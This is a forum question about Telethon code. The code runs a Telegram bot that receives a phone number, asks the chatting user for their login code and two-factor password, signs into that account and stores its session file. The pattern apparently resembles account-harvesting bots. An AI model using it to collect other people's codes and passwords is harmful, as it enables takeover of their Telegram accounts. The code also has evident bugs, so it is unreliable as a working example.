# To log out from all sessions in telethon

Tags: bots, telegram, telethon

**when I log into my account, all sessions are abruptly terminated. What is the expected reason for this? Is it due to the way the code is written or something else?**

*code python*

```py
from telethon.sync import TelegramClient, events,errors

api_id = ''
api_hash = ''


bot = TelegramClient("bot_login", api_id, api_hash).start(bot_token="")

    
@bot.on(events.NewMessage)
async def handle_message(event):
    print("ok")
    if "+" in event.raw_text:
        phone_number = event.raw_text  
        
    _client = TelegramClient("sessions/"+phone_number+".session", api_id, api_hash)
    await _client.connect()
    if not await _client.is_user_authorized():
        request = await _client.send_code_request(phone_number)
        async with bot.conversation(event.chat_id, timeout=300) as wit:
            code_msg= await wit.send_message("send code")
            code = await wit.get_response()
            try:
                login = await _client.sign_in(phone_number, code=int(code.message))
            except errors.SessionPasswordNeededError:
                password_msg = await wit.send_message("send password account")
                password = await wit.get_response()
                     
                login = await _client.sign_in(phone_number, password=password.text)

    await wit.send_message("login true")


        
   
    
    
        
bot.run_until_disconnected()
```